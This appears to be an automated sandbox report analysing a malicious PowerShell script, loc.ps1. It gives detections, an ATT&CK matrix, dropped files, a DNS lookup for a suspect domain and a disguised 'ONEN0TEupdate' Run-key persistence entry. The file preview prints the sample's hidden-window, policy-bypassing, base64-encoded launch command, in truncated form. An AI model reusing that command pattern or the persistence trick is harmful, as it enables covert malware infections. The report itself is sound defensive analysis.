Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts11
Command and Scripting Interpreter		1
Registry Run Keys / Startup Folder		11
Process Injection		1
Masquerading		OS Credential Dumping1
Security Software Discovery		Remote Services1
Archive Collected Data		Exfiltration Over Other Network Medium1
Encrypted Channel		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts2
PowerShell		Boot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder		21
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)11
Process Injection		Security Account Manager21
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
Deobfuscate/Decode Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets2
File and Directory Discovery		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials11
System Information Discovery		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
loc.ps18%ReversingLabsText.Trojan.Generic
loc.ps122%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://usherskenya.co.ke/forms/view.php8F0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.455798841.00000229BC21E000.00000004.00000800.00020000.00000000.sdmpfalse
    		high
    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmpfalse
      		high
      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        https://go.micropowershell.exe, 00000002.00000003.435183245.00000229AD753000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://contoso.com/powershell.exe, 00000002.00000002.455798841.00000229BC21E000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.455798841.00000229BC21E000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://contoso.com/Licensepowershell.exe, 00000002.00000002.455798841.00000229BC21E000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://contoso.com/Iconpowershell.exe, 00000002.00000002.455798841.00000229BC21E000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            https://usherskenya.co.ke/forms/view.php8Fpowershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.473249087.00000281B9C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.441829103.00000229AC1B1000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.441829103.00000229AC3BA000.00000004.00000800.00020000.00000000.sdmpfalse
                		high

                World Map of Contacted IPs

                No contacted IP infos

                General Information

                Joe Sandbox Version:37.1.0 Beryl
                Analysis ID:876995
                Start date and time:2023-05-28 09:32:52 +02:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 5m 34s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:6
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample file name:loc.ps1
                Detection:MAL
                Classification:mal64.troj.evad.winPS1@4/8@0/0
                EGA Information:
                • Successful, ratio: 50%
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 94%
                • Number of executed functions: 14
                • Number of non-executed functions: 3
                Cookbook Comments:
                • Found application associated with file extension: .ps1

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                • Excluded domains from analysis (whitelisted): usherskenya.co.ke, ctldl.windowsupdate.com
                • Execution Graph export aborted for target powershell.exe, PID 6560 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtQueryAttributesFile calls found.
                • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                • Report size getting too big, too many NtReadFile calls found.
                • Report size getting too big, too many NtSetInformationFile calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                09:33:52API Interceptor65x Sleep call for process: powershell.exe modified
                09:34:15AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ONEN0TEupdate_1220 C:\Users\user\AppData\Roaming\ONEN0TEupdate_1220\client32.exe
                09:34:23AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ONEN0TEupdate_1220 C:\Users\user\AppData\Roaming\ONEN0TEupdate_1220\client32.exe

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASNs

                No context

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):24349
                Entropy (8bit):5.044789539417162
                Encrypted:false
                SSDEEP:384:1fib4GxVoGIpN6KQkj2Akjh4iUxGz75ard3GnaOdBQtAHkoNXp5XNSSmebvOjJEm:1IxV3IpNBQkj25h4iUxGz75ard3GnaOQ
                MD5:4CE762BE063FD056F19DFE6020C1C756
                SHA1:49898445B83E8FE02CCC1E2ACD47130CA237CC85
                SHA-256:E902C6A8B5ECD8371795819B77445FC3C233B1FA7FC423F97FD52F13EF394049
                SHA-512:699D2F7CC17E60B40C3DFC836AE6989E39DDF439A4ACA8A00EEF36CB028AEFFE8B88B545D6E50112B1C60AD78CCB5F26E27C3ADA1261967A873F26D418693FC2
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:PSMODULECACHE.%..._t.....q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...Reset-DAClientExperienceConfiguration........Remove-DAEntryPointTableItem........New-DAEntryPointTableItem....#...Get-DAClientExperienceConfiguration....#...Disable-DAManualEntryPointSelection........Rename-DAEntryPointTableItem.........P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScr

                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):64
                Entropy (8bit):0.9260988789684415
                Encrypted:false
                SSDEEP:3:Nlllulb/lj:NllUb/l
                MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                Malicious:false
                Reputation:high, very likely benign file
                Preview:@...e................................................@..........

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0sbjehas.qns.ps1

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Reputation:high, very likely benign file
                Preview:1

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ibkftyv.amz.psm1

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Preview:1

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_em3oh2mh.n0i.ps1

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Preview:1

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ozkg1ozz.s3s.psm1

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Preview:1

                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3P1HFSB2X1BEQTFWIRPH.temp

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):6206
                Entropy (8bit):3.756573599783991
                Encrypted:false
                SSDEEP:48:94PQFjXe/9IWoF4sCErUHIJ8DgxIukvhkvklCywE1xPhou8keSogZoX1qvhou8kF:9/S9IzWsC/f4kvhkvCCtEfrJHKGrJHKA
                MD5:D8B0D167692A44937F77B1DEE0A2E153
                SHA1:CA9D4DB7C5B90C649997C67D4B7FAB35BB98A718
                SHA-256:B72E14C0A43285C3AAA1568E54E0D67E1FDF5911BA078052506CA05F42D9FF18
                SHA-512:DA5850C34D0A5B5F7649976F1BC78CD737B0037A232E1C0731C1C2B28BFFA4F8B061CDEDB79608A5F8199F66B7462F33216A616C734B99C16B697EEF783E7E08
                Malicious:false
                Preview:...................................FL..................F.".. .......-..7.4..a..\.................................:..DG..Yr?.D..U..k0.&...&...........-....................t...CFSF..1......NM...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......NM..V3......Y.....................R..A.p.p.D.a.t.a...B.V.1......NN...Roaming.@.......NM..V3......Y....................f...R.o.a.m.i.n.g.....\.1......U...MICROS~1..D.......NM..V3......Y.....................f0.M.i.c.r.o.s.o.f.t.....V.1......U....Windows.@.......NM..U.......Y.....................@9.W.i.n.d.o.w.s.......1......NN...STARTM~1..n.......NM..U.......Y..............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.t..Programs..j.......NM..U.......Y..............@......3..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......NM..U......Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......NM..P......Y..........

                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):6206
                Entropy (8bit):3.756573599783991
                Encrypted:false
                SSDEEP:48:94PQFjXe/9IWoF4sCErUHIJ8DgxIukvhkvklCywE1xPhou8keSogZoX1qvhou8kF:9/S9IzWsC/f4kvhkvCCtEfrJHKGrJHKA
                MD5:D8B0D167692A44937F77B1DEE0A2E153
                SHA1:CA9D4DB7C5B90C649997C67D4B7FAB35BB98A718
                SHA-256:B72E14C0A43285C3AAA1568E54E0D67E1FDF5911BA078052506CA05F42D9FF18
                SHA-512:DA5850C34D0A5B5F7649976F1BC78CD737B0037A232E1C0731C1C2B28BFFA4F8B061CDEDB79608A5F8199F66B7462F33216A616C734B99C16B697EEF783E7E08
                Malicious:false
                Preview:...................................FL..................F.".. .......-..7.4..a..\.................................:..DG..Yr?.D..U..k0.&...&...........-....................t...CFSF..1......NM...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......NM..V3......Y.....................R..A.p.p.D.a.t.a...B.V.1......NN...Roaming.@.......NM..V3......Y....................f...R.o.a.m.i.n.g.....\.1......U...MICROS~1..D.......NM..V3......Y.....................f0.M.i.c.r.o.s.o.f.t.....V.1......U....Windows.@.......NM..U.......Y.....................@9.W.i.n.d.o.w.s.......1......NN...STARTM~1..n.......NM..U.......Y..............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.t..Programs..j.......NM..U.......Y..............@......3..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......NM..U......Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......NM..P......Y..........

                Static File Info

                General

                File type:Unicode text, UTF-8 (with BOM) text, with very long lines (4805), with no line terminators
                Entropy (8bit):4.261717793830267
                TrID:
                • Text - UTF-8 encoded (3003/1) 100.00%
                File name:loc.ps1
                File size:4808
                MD5:d7bd6a17466dbe1e448956b0018ad94d
                SHA1:a9d50d22cc9024dc6bd3297286783ef4b38d6f99
                SHA256:5f5f8f102490525c22deed33b94fa01b52289e7166eedccd04cfece900958669
                SHA512:83b312bdce897983350521d8374c83403204b87f7d433c6b81b5f6ecd0d8011e91f77144caddbdd4c5596d9898ff6da750eca7f385688442797190543bcb1d4c
                SSDEEP:96:X6rCx5wroLBS4ch7S3NF7wJJTZW+1/BrbBEnwOeelJXk6ccWeCfNYV:q2fwroXY7S3NF7wplBrlEnwkxccWq
                TLSH:AAA1C078C775A9C00AF972C05EE138496078AD23C6748A78E96D4CE77D78601DF356B8
                File Content Preview:...powershell -nop -ep bypass -win hid -enc LgAoACcAYwBkACcAKQAgACQAewBFAGAATgBWADoAYQBwAGAAcABgAEQAQQB0AGEAfQA7ACAAJAB7AEwAYABpAG4ASwB9AD0AKAAiAHsAMAB9AHsAMQB9AHsANQB9AHsANgB9AHsANwB9AHsANAB9AHsAOAB9AHsAMgB9AHsAMwB9ACIAIAAtAGYAIAAnAGgAdAAnACwAJwB0AHAAcwA

                File Icon

                Icon Hash:3270d6baae77db44

                Network Behavior

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                May 28, 2023 09:33:59.266446114 CEST53653238.8.8.8192.168.2.5

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                May 28, 2023 09:33:59.266446114 CEST8.8.8.8192.168.2.50xaa9bServer failure (2)usherskenya.co.kenonenoneA (IP address)IN (0x0001)false

                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Target ID:0
                Start time:09:33:49
                Start date:28/05/2023
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\loc.ps1
                Imagebase:0x7ff7fbaf0000
                File size:447488 bytes
                MD5 hash:95000560239032BC68B4C2FDFCDEF913
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Reputation:high

                General

                Target ID:1
                Start time:09:33:49
                Start date:28/05/2023
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
